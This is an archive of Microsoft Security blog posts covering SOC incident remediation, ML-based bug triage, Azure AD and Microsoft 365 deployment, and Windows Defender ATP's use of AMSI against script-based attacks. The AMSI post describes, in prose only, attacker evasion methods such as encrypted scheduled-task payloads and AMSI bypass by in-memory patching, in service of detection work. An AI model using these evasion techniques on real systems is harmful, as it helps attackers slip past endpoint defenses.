Archive for the ‘Cloud Computing’ Category

Lessons learned from the Microsoft SOC—Part 3c: A day in the life part 2

May 5th, 2020 No comments

This is the sixth blog in the Lessons learned from the Microsoft SOC series designed to share our approach and experience from the front lines of our security operations center (SOC) protecting Microsoft and our Detection and Response Team (DART) helping our customers with their incidents. For a visual depiction of our SOC philosophy, download our Minutes Matter poster.

COVID-19 and the SOC

Before we conclude the day in the life, we thought we would share an analyst’s eye view of the impact of COVID-19. Our analysts are mostly working from home now and our cloud based tooling approach enabled this transition to go pretty smoothly. The differences in attacks we have seen are mostly in the early stages of an attack with phishing lures designed to exploit emotions related to the current pandemic and increased focus on home firewalls and routers (using techniques like RDP brute-forcing attempts and DNS poisoning—more here). The attack techniques they attempt to employ after that are fairly consistent with what they were doing before.

A day in the life—remediation

When we last left our heroes in the previous entry, our analyst had built a timeline of the potential adversary attack operation. Of course, knowing what happened doesn’t actually stop the adversary or reduce organizational risk, so let’s remediate this attack!

  1. Decide and act—As the analyst develops a high enough level of confidence that they understand the story and scope of the attack, they quickly shift to planning and executing cleanup actions. While this appears as a separate step in this particular description, our analysts often execute on cleanup operations as they find them.

Big Bang or clean as you go?

Depending on the nature and scope of the attack, analysts may clean up attacker artifacts as they go (emails, hosts, identities) or they may build a list of compromised resources to clean up all at once (Big Bang)

  • Clean as you go—For most typical incidents that are detected early in the attack operation, analysts quickly clean up the artifacts as we find them. This rapidly puts the adversary at a disadvantage and prevents them from moving forward with the next stage of their attack.
  • Prepare for a Big Bang—This approach is appropriate for a scenario where an adversary has already “settled in” and established redundant access mechanisms to the environment (frequently seen in incidents investigated by our Detection and Response Team (DART) at customers). In this case, analysts should avoid tipping off the adversary until full discovery of all attacker presence is discovered as surprise can help with fully disrupting their operation. We have learned that partial remediation often tips off an adversary, which gives them a chance to react and rapidly make the incident worse (spread further, change access methods to evade detection, inflict damage/destruction for revenge, cover their tracks, etc.).Note that cleaning up phishing and malicious emails can often be done without tipping off the adversary, but cleaning up host malware and reclaiming control of accounts has a high chance of tipping off the adversary.

These are not easy decisions to make and we have found no substitute for experience in making these judgement calls. The collaborative work environment and culture we have built in our SOC helps immensely as our analysts can tap into each other’s experience to help making these tough calls.

The specific response steps are very dependent on the nature of the attack, but the most common procedures used by our analysts include:

  • Client endpoints—SOC analysts can isolate a computer and contact the user directly (or IT operations/helpdesk) to have them initiate a reinstallation procedure.
  • Server or applications—SOC analysts typically work with IT operations and/or application owners to arrange rapid remediation of these resources.
  • User accounts—We typically reclaim control of these by disabling the account and resetting password for compromised accounts (though these procedures are evolving as a large amount of our users are mostly passwordless using Windows Hello or another form of MFA). Our analysts also explicitly expire all authentication tokens for the user with Microsoft Cloud App Security.
    Analysts also review the multi-factor phone number and device enrollment to ensure it hasn’t been hijacked (often contacting the user), and reset this information as needed.
  • Service Accounts—Because of the high risk of service/business impact, SOC analysts work with the service account owner of record (falling back on IT operations as needed) to arrange rapid remediation of these resources.
  • Emails—The attack/phishing emails are deleted (and sometimes cleared to prevent recovering of deleted emails), but we always save a copy of original email in the case notes for later search and analysis (headers, content, scripts/attachments, etc.).
  • Other—Custom actions can also be executed based on the nature of the attack such as revoking application tokens, reconfiguring servers and services, and more.

Automation and integration for the win

It’s hard to overstate the value of integrated tools and process automation as these bring so many benefits—improving the analysts daily experience and improving the SOC’s ability to reduce organizational risk.

  • Analysts spend less time on each incident, reducing the attacker’s time to operation—measured by mean time to remediate (MTTR).
  • Analysts aren’t bogged down in manual administrative tasks so they can react quickly to new detections (reducing mean time to acknowledge—MTTA).
  • Analysts have more time to engage in proactive activities that both reduce organization risk and increase morale by keeping them focused on the mission.

Our SOC has a long history of developing our own automation and scripts to make analysts lives easier by a dedicated automation team in our SOC. Because custom automation requires ongoing maintenance and support, we are constantly looking for ways to shift automation and integration to capabilities provided by Microsoft engineering teams (which also benefits our customers). While still early in this journey, this approach typically improves the analyst experience and reduces maintenance effort and challenges.

This is a complex topic that could fill many blogs, but this takes two main forms:

  • Integrated toolsets save analysts manual effort during incidents by allowing them to easily navigate multiple tools and datasets. Our SOC relies heavily on the integration of Microsoft Threat Protection (MTP) tools for this experience, which also saves the automation team from writing and supporting custom integration for this.
  • Automation and orchestration capabilities reduce manual analyst work by automating repetitive tasks and orchestrating actions between different tools. Our SOC currently relies on an advanced custom SOAR platform and is actively working with our engineering teams (MTP’s AutoIR capability and Azure Sentinel SOAR) on how to shift our learnings and workload onto those capabilities.

After the attacker operation has been fully disrupted, the analyst marks the case as remediated, which is the timestamp signaling the end of MTTR measurement (which started when the analyst began the active investigation in step 2 of the previous blog).

While having a security incident is bad, having the same incident repeated multiple times is much worse.

  1. Post-incident cleanup—Because lessons aren’t actually “learned” unless they change future actions, our analysts always integrate any useful information learned from the investigation back into our systems. Analysts capture these learnings so that we avoid repeating manual work in the future and can rapidly see connections between past and future incidents by the same threat actors. This can take a number of forms, but common procedures include:
    • Indicators of Compromise (IoCs)—Our analysts record any applicable IoCs such as file hashes, malicious IP addresses, and email attributes into our threat intelligence systems so that our SOC (and all customers) can benefit from these learnings.
    • Unknown or unpatched vulnerabilities—Our analysts can initiate processes to ensure that missing security patches are applied, misconfigurations are corrected, and vendors (including Microsoft) are informed of “zero day” vulnerabilities so that they can create security patches for them.
    • Internal actions such as enabling logging on assets and adding or changing security controls. 

Continuous improvement

So the adversary has now been kicked out of the environment and their current operation poses no further risk. Is this the end? Will they retire and open a cupcake bakery or auto repair shop? Not likely after just one failure, but we can consistently disrupt their successes by increasing the cost of attack and reducing the return, which will deter more and more attacks over time. For now, we must assume that adversaries will try to learn from what happened on this attack and try again with fresh ideas and tools.

Because of this, our analysts also focus on learning from each incident to improve their skills, processes, and tooling. This continuous improvement occurs through many informal and formal processes ranging from formal case reviews to casual conversations where they tell the stories of incidents and interesting observations.

As caseload allows, the investigation team also hunts proactively for adversaries when they are not on shift, which helps them stay sharp and grow their skills.

This closes our virtual shift visit for the investigation team. Join us next time as we shift to our Threat hunting team (a.k.a. Tier 3) and get some hard won advice and lessons learned.

…until then, share and enjoy!

P.S. If you are looking for more information on the SOC and other cybersecurity topics, check out previous entries in the series (Part 1 | Part 2a | Part 2b | Part 3a | Part 3b), Mark’s List (, and our new security documentation site— Be sure to bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Or reach out to Mark on LinkedIn or Twitter.

The post Lessons learned from the Microsoft SOC—Part 3c: A day in the life part 2 appeared first on Microsoft Security.

Secure the software development lifecycle with machine learning

April 16th, 2020 No comments

Every day, software developers stare down a long list of features and bugs that need to be addressed. Security professionals try to help by using automated tools to prioritize security bugs, but too often, engineers waste time on false positives or miss a critical security vulnerability that has been misclassified. To tackle this problem data science and security teams came together to explore how machine learning could help. We discovered that by pairing machine learning models with security experts, we can significantly improve the identification and classification of security bugs.

At Microsoft, 47,000 developers generate nearly 30 thousand bugs a month. These items get stored across over 100 AzureDevOps and GitHub repositories. To better label and prioritize bugs at that scale, we couldn’t just apply more people to the problem. However, large volumes of semi-curated data are perfect for machine learning. Since 2001 Microsoft has collected 13 million work items and bugs. We used that data to develop a process and machine learning model that correctly distinguishes between security and non-security bugs 99 percent of the time and accurately identifies the critical, high priority security bugs, 97 percent of the time. This is an overview of how we did it.

Qualifying data for supervised learning

Our goal was to build a machine learning system that classifies bugs as security/non-security and critical/non-critical with a level of accuracy that is as close as possible to that of a security expert. To accomplish this, we needed a high-volume of good data. In supervised learning, machine learning models learn how to classify data from pre-labeled data. We planned to feed our model lots of bugs that are labeled security and others that aren’t labeled security. Once the model was trained, it would be able to use what it learned to label data that was not pre-classified. To confirm that we had the right data to effectively train the model, we answered four questions:

  • Is there enough data? Not only do we need a high volume of data, we also need data that is general enough and not fitted to a small number of examples.
  • How good is the data? If the data is noisy it means that we can’t trust that every pair of data and label is teaching the model the truth. However, data from the wild is likely to be imperfect. We looked for systemic problems rather than trying to get it perfect.
  • Are there data usage restrictions? Are there reasons, such as privacy regulations, that we can’t use the data?
  • Can data be generated in a lab? If we can generate data in a lab or some other simulated environment, we can overcome other issues with the data.

Our evaluation gave us confidence that we had enough good data to design the process and build the model.

Data science + security subject matter expertise

Our classification system needs to perform like a security expert, which means the subject matter expert is as important to the process as the data scientist. To meet our goal, security experts approved training data before we fed it to the machine learning model. We used statistical sampling to provide the security experts a manageable amount of data to review. Once the model was working, we brought the security experts back in to evaluate the model in production.

With a process defined, we could design the model. To classify bugs accurately, we used a two-step machine learning model operation. First the model learned how to classify security and non-security bugs. In the second step the model applied severity labels—critical, important, low-impact—to the security bugs.

Our approach in action

Building an accurate model is an iterative process that requires strong collaboration between subject matter experts and data scientists:

Data collection: The project starts with data science. We identity all the data types and sources and evaluate its quality.

Data curation and approval: Once the data scientist has identified viable data, the security expert reviews the data and confirms the labels are correct.

Modeling and evaluation: Data scientists select a data modeling technique, train the model, and evaluate model performance.

Evaluation of model in production: Security experts evaluate the model in production by monitoring the average number of bugs and manually reviewing a random sampling of bugs.

The process didn’t end once we had a model that worked. To make sure our bug modeling system keeps pace with the ever-evolving products at Microsoft, we conduct automated re-training. The data is still approved by a security expert before the model is retrained, and we continuously monitor the number of bugs generated in production.

More to come

By applying machine learning to our data, we accurately classify which work items are security bugs 99 percent of the time. The model is also 97 percent accurate at labeling critical and non-critical security bugs. This level of accuracy gives us confidence that we are catching more security vulnerabilities before they are exploited.

In the coming months, we will open source our methodology to GitHub.

In the meantime, you can read a published academic paper, Identifying security bug reports based solely on report titles and noisy data, for more details. Or download a short paper that was featured at Grace Hopper Celebration 2019.

Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. To learn more about our Security solutions visit our website.

The post Secure the software development lifecycle with machine learning appeared first on Microsoft Security.

Enable remote work while keeping cloud deployments secure

April 9th, 2020 No comments

As our customers shift to remote work in response to the COVID-19 outbreak, many have asked how to maintain the security posture of their cloud assets. Azure Security Center security controls can help you monitor your security posture as usage of cloud assets increases. These are three common scenarios:

  1. Enable multi-factor authentication (MFA) to enhance identity protection.
  2. Use just-in-time (JIT) VM access for users that need remote access via RDP or SSH to servers that are in your Azure infrastructure.
  3. Review the “Remediate vulnerabilities control” in Azure Security Center to identify critical security updates needed workloads (servers, containers, databases) that will be accessed remotely.

Read Keeping your cloud deployments secure during challenging times for detailed instructions.

The post Enable remote work while keeping cloud deployments secure appeared first on Microsoft Security.

Categories: Azure Security, Cloud Computing Tags:

Voice of the Customer: Walmart embraces the cloud with Azure Active Directory

October 22nd, 2018 No comments

Todays post was written by Sue Bohn, partner director of Program Management and Ben Byford and Gerald Corson, senior directors of Identity and Access Management at Walmart.


Im Sue Bohn, partner director of Program Management at Microsoft. Im an insatiable, lifelong learner and I lead the Customer & Partner Success team for the Identity Division. Im jazzed to introduce the Voice of the Customer blog series.In this series, the best of our customers will present their deployment stories to help you learn how you can get the most out of Azure Active Directory (Azure AD).Today well hear from Walmart. I love the convenience of Walmart; where else can you buy tires, socks, and orange juice in one trip?

Walmart teamed up with Microsoft to digitally transform its operations, empower associates with easy-to-use technology, and make shopping faster and easier for millions of customers around the world. But this strategic partnership didnt just happen overnight. In the beginning, Walmarts cybersecurity team was skeptical about the security of the public cloud and Azure AD. Ben Byford and Gerald Corson, senior directors of Identity and Access Management at Walmart, share their teams journey working with Microsoft to embrace the cloud with Azure AD:

Working closely with our Microsoft account team convinced us we could safely write back to on-premises and enable password hash synch

In the beginning, we were willing to feed to the cloud but at that time not comfortable allowing the syncing of passwords to the cloud or write back to on-premises from cloud. We were skeptical of the security controls. We involved Microsoft in the strategy and planning phases of our initiatives and made slow but steady progress. As we worked with the Microsoft team, representatives were eager to get any and all feedback and to provide it to their product groups. This led to our critical Azure AD enhancement requests being received and solutions were delivered. When we ran into bugs, we were able to troubleshoot issues with the very people who wrote the application code. Our Microsoft account team was right there with us, in the trenches, and they were committed to making sure we were confident in Azure ADs capabilities. Over time, as we learned more about Azure AD and the new security features we were enabling, our trust in Microsofts Azure AD security capabilities grew and many of our security concerns were alleviated.

Given our scale, validating and verifying the security capabilities of Azure AD was key to empowering our users while still protecting the enterprise. Walmart currently has over 2.5 million Azure AD users enrolled, and with that many users we need very granular controls to adequately protect our assets. The entire team, including Microsoft, rolled up our sleeves to figure out how to make it work, and together weve enabled several features that let us apply custom security policies. Azure Information Protection (AIP), an amazing solution that is only possible with Azure AD, allows us to classify and label documents and emails to better protect our data. Azure AD Privileged Identity Management (PIM) gives us more visibility and control over admins. Azure AD dynamic groups lets us automatically enable app access to our users. This is a huge time saver in an environment with over half a million groups. With all of the work we did with Microsoft and our internal security team, we were able to turn on the two features we previously did not think we would be able topassword hash synch and write back from cloud to on-premises. This was critical to our journey as we had never allowed a cloud solution to feed back into our core environment in this manner.

Driving down help desk calls with self-service password reset

One example that shows how much we trust the security of Azure AD and the cloud is self-service password reset (SSPR). The biggest driver of help desk calls at Walmart is people who get locked out of their accounts because of a forgotten password. It wastes a tremendous amount of our help desks time and frustrates associates who lose time sitting on the phone. We believed that letting users reset their passwords and unlock their accounts without help desk involvement would go a long way and improve productivity, but we had always been nervous about giving people who werent on Walmart PCs that kind of access. Another hurdle was ensuring that our hourly associates were only able to utilize this service while they were clocked in for work. Microsoft helped us solve this with the implementation of custom controls.

Our Microsoft team supported us the entire way, and were proud to say that SSPR is being rolled out. When we started this journey, we would never have believed that we would allow people to reset their passwords from a public interface, but here we are, and the user experience is great!

Engage Microsoft early

If there is one thing we would have done differently, it would be to engage Microsoft at a deeper level earlier on in the process. Our public cloud adoption didnt really take off until we brought them in and spent time with their backend product engineering teams. Microsofts commitment to improving security and the cloud is clear. Their work to safeguard data has continuously improved, and while we work closer with them, they also continue to incorporate our feedback into future feature releases. It is the relationship that has allowed us to securely implement Azure AD at our scale.

We look forward to sharing our next big success: implementation of Azure AD B2B.

Voice of the Customer: looking ahead

Many thanks to Ben and Gerald for sharing their journey from on-premises to Azure AD. Our customers have told us how valuable it is to learn from their peers. The Voice of the Customer blog series is designed to share our customers security and implementation insights more broadly. Bookmark the Microsoft Secure blog so you dont miss part 2 in this series. Our next customer will speak to how Azure AD and implementing cloud Identity and Access Management makes them more secure.

The post Voice of the Customer: Walmart embraces the cloud with Azure Active Directory appeared first on Microsoft Secure.

Categories: Cloud Computing, cybersecurity Tags:

Secure file storage

October 16th, 2018 No comments

Image taken at the Microsoft Ignite Conference.

This is a blog series that responds to common questions we receive from customers about deployment of Microsoft 365 security solutions. In this series, youll find context, answers, and guidance for deployment and driving adoption within your organization. Check out Collaborate Securely, the fifth blog in our eight-blog series on deploying intelligent security scenarios.

Employees are often tasked with preparing documents that require them to gather expertise from various people, often both internal and external to their organization. This common practice can expose your company data at unsecured points along the way. To mitigate risk, Microsoft 365 has simplified and secured the process of sharing files so that employees can easily gather data, expert opinions, edits, and responsesfrom only the right people in a single document.


How can I centrally store information, so its discoverable by colleagues but not anyone else?

To answer this question, lets start with storage first, then move to search.

Store securely

To help your employees easily discover relevant data for their projects and keep that data internal and secure, you can build a team site in SharePoint Online. If your employees need to make their notes or informal insights discoverable, but keep the information secure, deploy OneNote and have employees password-protect their notes.

You can deploy OneNote through Microsoft Intune to your Intune-managed employee devices, or have your employees sign in with their Microsoft Azureprovisioned ID and download OneNote to their devices. The owner of the SharePoint library, list, or survey can change permissions to let the right people access the data they need while restricting others. You can also empower your employees to build and maintain their own SharePoint Online team with security safeguards that you have established.

Search securely

Once youve set up your team site, SharePoint Intelligent Search and Discovery allows both you and your employees to discover and organize relevant information from other employees work files across Microsoft 365. It keeps your organizations documents discoverable only within your protected cloud, according to each users permission settings. You can also set permissions, so your employees will see only documents that you have already given them access to.


How do I make use of automation to ensure that employees have the correct permissions?

By enabling a dynamic group in Azure Active Directory (Azure AD), you will ensure that users can be automatically assigned to groups according to attributes that you define. For example, if users move to a new department, when their department name changes in Azure AD, rules will automatically assign them to new security groups defined for their new department. By using these Azure ADbased advanced rules that enable complex, attribute-based, dynamic memberships for groups, you can protect organizational data on several levels.


Deployment tips from our experts

  • Make information discoverable and secure. Help your employees easily discover relevant data for their projects. Start by building a team site in SharePoint Online. Store notes securely in Microsoft OneNote and ensure they discover relevant information across Office 365 with SharePoint Intelligent Search and Discovery.
  • Plan for success with Microsoft FastTrack. FastTrack comes with your subscription at no additional charge. Whether youre planning your initial rollout, needing to onboard your product, or driving end-user adoption, FastTrack is your benefit service that is ready to assist you. Get started at FastTrack for Microsoft 365.


Want to learn more?

For more information and guidance on this topic, check out the white paper Empower people to discover, share, and edit files and information securely. You can find additional security resources on

Coming Soon! Share files easily and securely is the seventh installment of our Deploying Intelligent Scenarios” series. In November, we will kick off a new series: “Top 10 Security Deployment Actions with Microsoft 365 Security.”


More blog posts from this series

The post Secure file storage appeared first on Microsoft Secure.

Categories: Cloud Computing Tags:

Enable your users to work securely from anywhere, anytime, across all of their devices

July 18th, 2018 No comments


Image of four hands collaborating over a drawing of a lightbulb.This blog is part of a series that responds to common questions we receive from customers about deployment of Microsoft 365 Security solutions. In this series youll find context, answers, and guidance for deployment and driving adoption within your organization. Check out our last blog, Assessing Microsoft 365 Security solutions using the NIST Cybersecurity Framework.

Your users expect technology to help them be productive, yet you need to keep your organizations data safe. This blog will show you how Microsoft 365 Security solutions can help you achieve this fine balance between productivity and security. We recommend an integrated solution that incorporates managing identities, managing devices, then securing applications, email, and data.

First, well start with the question that we often hear from customers: How can I make sure my employees are working securely when they are working remotely? With digital technology changing how people work, users need to be productive on a variety of devices, regardless if they are company-provided or bring your own device (BYOD). The vital foundation to your in-depth security strategy is strong, integrated identity protection.

Securing identities to protect at the front door

Identity management in Azure Active Directory (Azure AD) is your first step. Once user identities are managed in Azure AD, you can enable Azure AD single sign-on (SSO) to manage authentication across devices, cloud apps, and on-premises apps. Then layer Multi-factor Authentication (MFA) with Azure AD Conditional Access (see Figure 1). These security tools work together to reauthenticate high-risk users and to take automated action to secure your network.

Infographic of a conditions and controls that create a secure network.Figure 1. Set user policies using Azure AD Conditional Access.

Security across devices

From identity, we move to devices. Microsoft Intune lets you manage both company-owned and BYOD from the cloud. Once you set up your Intune subscription, you can add users and groups, assign licenses, deploy and protect apps, and set up device enrollment.

Through Azure AD, you can then create conditional access policies according to user, device, application, and risk.

To strengthen employee sign-in on Windows 10 PCs, Windows Hello for Business replaces passwords with strong MFA consisting of a user credential and biometric or PIN.

Security across apps

Microsoft Cloud App Security gives you visibility and control over the cloud apps that your employees are using. You can see the overall picture of cloud apps across your network, including any unsanctioned apps your employees may be using. Discovering shadow IT apps can help you prevent unmonitored avenues into or out of your network.

Security across email

Once you have secured your organizations devices and applications, its equally important to safeguard your organizations flow of information. Sending and receiving email is one of the weakest spots for IT security. Azure Information Protection allows you to configure policies to classify, label, and protect data based on sensitivity. Then you can track activities on shared data and revoke user access if necessary.

For security against malicious emails, Office 365 Advanced Threat Protection (ATP) lets you set up anti-phishing protections to protect your employees from increasingly sophisticated phishing attacks.

Security across data

Once you have secured how employees access data, its equally important to safeguard the data itself. Microsoft BitLocker Drive Encryption technology prevents others from accessing your disk drives and flash drives without authorization, even if theyre lost or stolen. Windows Information Protection helps protect against accidental data leaks, with protection and policies that travel with the data wherever it goes.

Deployment tips from our experts

Now that you know more about how Microsoft 365 security solutions can protect your people and data in a mobile world, here are three proven tips to put it all into action:

  1. Be proactive, not reactive. Proactively provision identities through Azure AD, enroll devices through Microsoft Intune, and set up Intune App Protection. Enrolling devices can help keep your companys data safe by preventing threats or data breaches before they happen.
  2. Keep your company data safe. Managing employee identities is a fundamental part of information security. Enable SSO and MFA, set up conditional access policies, and then deploy Azure Information Protection for classification and protection of sensitive data.
  3. Plan for success with Microsoft FastTrack. This valuable service comes with your subscription at no additional charge. Whether youre planning your initial rollout, needing to onboard your product, or driving user adoption, FastTrack is your benefit service that is ready to assist you. Get started at FastTrack for Microsoft 365.

Want to learn more?

For more information and guidance on this topic, stay tuned for the white paper Work securely from anywhere, anytime, across all your devices coming soon!

More blog posts from this series:

Categories: Cloud Computing Tags:

Windows Defender ATP machine learning and AMSI: Unearthing script-based attacks that ‘live off the land’

December 4th, 2017 No comments

Data center

Scripts are becoming the weapon of choice of sophisticated activity groups responsible for targeted attacks as well as malware authors who indiscriminately deploy commodity threats.

Scripting engines such as JavaScript, VBScript, and PowerShell offer tremendous benefits to attackers. They run through legitimate processes and are perfect tools for living off the landstaying away from the disk and using common tools to run code directly in memory. Often part of the operating system, scripting engines can evaluate and execute content from the internet on-the-fly. Furthermore, integration with popular apps make them effective vehicles for delivering malicious implants through social engineering as evidenced by the increasing use of scripts in spam campaigns.

Malicious scripts are not only used as delivery mechanisms. We see them in various stages of the kill chain, including during lateral movement and while establishing persistence. During these latter stages, the scripting engine of choice is clearly PowerShellthe de facto scripting standard for administrative tasks on Windowswith the ability to invoke system APIs and access a variety of system classes and objects.

While the availability of powerful scripting engines makes scripts convenient tools, the dynamic nature of scripts allows attackers to easily evade analysis and detection by antimalware and similar endpoint protection products. Scripts are easily obfuscated and can be loaded on-demand from a remote site or a key in the registry, posing detection challenges that are far from trivial.

Windows 10 provides optics into script behavior through Antimalware Scan Interface (AMSI), a generic, open interface that enables Windows Defender Antivirus to look at script contents the same way script interpreters doin a form that is both unencrypted and unobfuscated. In Windows 10 Fall Creators Update, with knowledge from years analyzing script-based malware, weve added deep behavioral instrumentation to the Windows script interpreter itself, enabling it to capture system interactions originating from scripts. AMSI makes this detailed interaction information available to registered AMSI providers, such as Windows Defender Antivirus, enabling these providers to perform further inspection and vetting of runtime script execution content.

This unparalleled visibility into script behavior is capitalized further through other Windows 10 Fall Creators Update enhancements in both Windows Defender Antivirus and Windows Defender Advanced Threat Protection (Windows Defender ATP). Both solutions make use of powerful machine learning algorithms that process the improved optics, with Windows Defender Antivirus delivering enhanced blocking of malicious scripts pre-breach and Windows Defender ATP providing effective behavior-based alerting for malicious post-breach script activity.

In this blog, we explore how Windows Defender ATP, in particular, makes use of AMSI inspection data to surface complex and evasive script-based attacks. We look at advanced attacks perpetrated by the highly skilled KRYPTON activity group and explore how commodity malware like Kovter abuses PowerShell to leave little to no trace of malicious activity on disk. From there, we look at how Windows Defender ATP machine learning systems make use of enhanced insight about script characteristics and behaviors to deliver vastly improved detection capabilities.

KRYPTON: Highlighting the resilience of script-based attacks

Traditional approaches for detecting potential breaches are quite file-centric. Incident responders often triage autostart entries, sorting out suspicious files by prevalence or unusual name-folder combinations. With modern attacks moving closer towards being completely fileless, it is crucial to have additional sensors at relevant choke points.

Apart from not having files on disk, modern script-based attacks often store encrypted malicious content separately from the decryption key. In addition, the final key often undergoes multiple processes before it is used to decode the actual payload, making it is impossible to make a determination based on a single file without tracking the actual invocation of the script. Even a perfect script emulator would fail this task.

For example, the activity group KRYPTON has been observed hijacking or creating scheduled tasksthey often target system tasks found in exclusion lists of popular forensic tools like Autoruns for Windows. KRYPTON stores the unique decryption key within the parameters of the scheduled task, leaving the actual payload content encrypted.

To illustrate KRYPTON attacks, we look at a tainted Microsoft Word document identified by John Lambert and the Office 365 Advanced Threat Protection team.

KRYPTON lure document

Figure 1. KRYPTON lure document

To live off the land, KRYPTON doesnt drop or carry over any traditional malicious binaries that typically trigger antimalware alerts. Instead, the lure document contains macros and uses the Windows Scripting Host (wscript.exe) to execute a JavaScript payload. This script payload executes only with the right RC4 decryption key, which is, as expected, stored as an argument in a scheduled task. Because it can only be triggered with the correct key introduced in the right order, the script payload is resilient against automated sandbox detonations and even manual inspection.

KRYPTON script execution chain through wscript.exe

Figure 2. KRYPTON script execution chain through wscript.exe

Exposing actual script behavior with AMSI

AMSI overcomes KRYPTONs evasion mechanisms by capturing JavaScript API calls after they have been decrypted and ready to be executed by the script interpreter. The screenshot below shows part of the exposed content from the KRYPTON attack as captured by AMSI.

Part of the KRYPTON script payload captured by AMSI and sent to the cloud for analysis

Figure 3. Part of the KRYPTON script payload captured by AMSI and sent to the cloud for analysis

By checking the captured script behavior against indicators of attack (IoAs) built up by human experts as well as machine learning algorithms, Windows Defender ATP effortlessly flags the KRYPTON scripts as malicious. At the same time, Windows Defender ATP provides meaningful contextual information, including how the script is triggered by a malicious Word document.

Windows Defender ATP machine learning detection of KRYPTON script captured by AMSI

Figure 4. Windows Defender ATP machine learning detection of KRYPTON script captured by AMSI

PowerShell use by Kovter and other commodity malware

Not only advanced activity groups like KRYPTON are shifting from binary executables to evasive scripts. In the commodity space, Kovter malware uses several processes to eventually execute its malicious payload. This payload resides in a PowerShell script decoded by a JavaScript (executed by wscript.exe) and passed to powershell.exe as an environment variable.

Windows Defender ATP machine learning alert for the execution of the Kovter script-based payload

Figure 5. Windows Defender ATP machine learning alert for the execution of the Kovter script-based payload

By looking at the PowerShell payload content captured by AMSI, experienced analysts can easily spot similarities to PowerSploit, a publicly available set of penetration testing modules. While such attack techniques involve file-based components, they remain extremely hard to detect using traditional methods because malicious activities occur only in memory. Such behavior, however, is effortlessly detected by Windows Defender ATP using machine learning that combines detailed AMSI signals with signals generated by PowerShell activity in general.

Part of the Kovter script payload captured by AMSI and sent to the cloud for analysis

Figure 6. Part of the Kovter script payload captured by AMSI and sent to the cloud for analysis

Fresh machine learning insight with AMSI

While AMSI provides rich information from captured script content, the highly variant nature of malicious scripts continues to make them challenging targets for detection. To efficiently extract and identify new traits differentiating malicious scripts from benign ones, Windows Defender ATP employs advanced machine learning methods.

As outlined in our previous blog, we employ a supervised machine learning classifier to identify breach activity. We build training sets based on malicious behaviors observed in the wild and normal activities on typical machines, augmenting that with data from controlled detonations of malicious artifacts. The diagram below conceptually shows how we capture malicious behaviors in the form of process trees.

Process tree augmented by instrumentation for AMSI data

Figure 7. Process tree augmented by instrumentation for AMSI data

As shown in the process tree, the kill chain begins with a malicious document that causes Microsoft Word (winword.exe) to launch PowerShell (powershell.exe). In turn, PowerShell executes a heavily obfuscated script that drops and executes the malware fhjUQ72.tmp, which then obtains persistence by adding a run key to the registry. From the process tree, our machine learning systems can extract a variety of features to build expert classifiers for areas like registry modification and file creation, which are then converted into numeric scores that are used to decide whether to raise alerts.

With the instrumentation of AMSI signals added as part of the Windows 10 Fall Creators Update (version 1709), Windows Defender ATP machine learning algorithms can now make use of insight into the unobfuscated script content while continually referencing machine state changes associated with process activity. Weve also built a variety of script-based models that inspect the nature of executed scripts, such as the count of obfuscation layers, entropy, obfuscation features, ngrams, and specific API invocations, to name a few.

As AMSI peels off the obfuscation layers, Windows Defender ATP benefits from growing visibility and insight into API calls, variable names, and patterns in the general structure of malicious scripts. And while AMSI data helps improve human expert knowledge and their ability to train learning systems, our deep neural networks automatically learn features that are often hidden from human analysts.

Machine-learning detections of JavaScript and PowerShell scripts

Figure 8. Machine learning detections of JavaScript and PowerShell scripts

While these new script-based machine learning models augment our expert classifiers, we also correlate new results with other behavioral information. For example, Windows Defender ATP correlates the detection of suspicious script contents from AMSI with other proximate behaviors, such as network connections. This contextual information is provided to SecOps personnel, helping them respond to incidents efficiently.

Machine learning combines VBScript content from AMSI and tracked network activity

Figure 9. Machine learning combines VBScript content from AMSI and tracked network activity

Detection of AMSI bypass attempts

With AMSI providing powerful insight into malicious script activity, attacks are more likely to incorporate AMSI bypass mechanisms that we group into three categories:

  • Bypasses that are part of the script content and can be inspected and alerted on
  • Tampering with the AMSI sensor infrastructure, which might involve the replacement of system files or manipulation of the load order of relevant DLLs
  • Patching of AMSI instrumentation in memory

The Windows Defender ATP research team proactively develops anti-tampering mechanisms for all our sensors. We have devised heuristic alerts for possible manipulation of our optics, designing these alerts so that they are triggered in the cloud before the bypass can suppress them.

During actual attacks involving CVE-2017-8759, Windows Defender ATP not only detected malicious post-exploitation scripting activity but also detected attempts to bypass AMSI using code similar to one identified by Matt Graeber.

Windows Defender ATP alert based on AMSI bypass pattern

Figure 10. Windows Defender ATP alert based on AMSI bypass pattern

AMSI itself captured the following bypass code for analysis in the Windows Defender ATP cloud.

AMSI bypass code sent to the cloud for analysis

Figure 11. AMSI bypass code sent to the cloud for analysis

Conclusion: Windows Defender ATP machine learning and AMSI provide revolutionary defense against highly evasive script-based attacks

Provided as an open interface on Windows 10, Antimalware Scan Interface delivers powerful optics into malicious activity hidden in encrypted and obfuscated scripts that are oftentimes never written to disk. Such evasive use of scripts is becoming commonplace and is being employed by both highly skilled activity groups and authors of commodity malware.

AMSI captures malicious script behavior by looking at script content as it is interpreted, without having to check physical files or being hindered by obfuscation, encryption, or polymorphism. At the endpoint, AMSI benefits local scanners, providing the necessary optics so that even obfuscated and encrypted scripts can be inspected for malicious content. Windows Defender Antivirus, specifically, utilizes AMSI to dynamically inspect and block scripts responsible for dropping all kinds of malicious payloads, including ransomware and banking trojans.

With Windows 10 Fall Creators Update (1709), newly added script runtime instrumentation provides unparalleled visibility into script behaviors despite obfuscation. Windows Defender Antivirus uses this treasure trove of behavioral information about malicious scripts to deliver pre-breach protection at runtime. To deliver post-breach defense, Windows Defender ATP uses advanced machine learning systems to draw deeper insight from this data.

Apart from looking at specific activities and patterns of activities, new machine learning algorithms in Windows Defender ATP look at script obfuscation layers, API invocation patterns, and other features that can be used to efficiently identify malicious scripts heuristically. Windows Defender ATP also correlates script-based indicators with other proximate activities, so it can deliver even richer contextual information about suspected breaches.

To benefit from the new script runtime instrumentation and other powerful security enhancements like Windows Defender Exploit Guard, customers are encourage to install Windows 10 Fall Creators Update.

Read the The Total Economic Impact of Microsoft Windows Defender Advanced Threat Protection from Forrester to understand the significant cost savings and business benefits enabled by Windows Defender ATP. To directly experience how Windows Defender ATP can help your enterprise detect, investigate, and respond to advance attacks, sign up for a free trial.


Stefan Sellmer, Windows Defender ATP Research


Shay Kels, Windows Defender ATP Research

Karthik Selvaraj, Windows Defender Research


Additional readings


Talk to us

